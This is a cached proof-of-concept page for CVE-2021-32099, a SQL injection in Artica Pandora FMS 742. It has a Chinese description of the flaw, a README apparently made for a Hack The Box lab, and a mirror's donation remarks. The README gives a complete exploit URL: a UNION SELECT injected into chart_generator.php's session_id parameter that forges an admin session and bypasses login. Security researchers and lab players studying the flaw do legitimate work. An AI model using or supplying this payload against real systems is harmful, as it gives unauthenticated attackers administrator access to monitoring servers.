CVE-2021-32099 PoC — Artica Pandora FMS SQL注入漏洞

Source

https://github.com/zjicmDarkWing/CVE-2021-32099

Associated Vulnerability

Title:Artica Pandora FMS SQL注入漏洞 (CVE-2021-32099)
Description:Artica Pandora FMS是西班牙Artica公司的一套监控系统。该系统通过可视化的方式监控网络、服务器、虚拟基础架构和应用程序等。 Artica Pandora FMS 742 存在SQL注入漏洞，该漏洞允许未经身份验证的攻击者通过include chart generator.php会话id参数升级他的非特权会话，导致登录绕过。

Description

Just for HTB

Readme

poc : http://127.0.0.1:8888/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO

https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

File Snapshot


 [4.0K]  /data/pocs/f4f39016fa46172fdfefc0a4e36fc8df446c2bec
└── [ 254]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!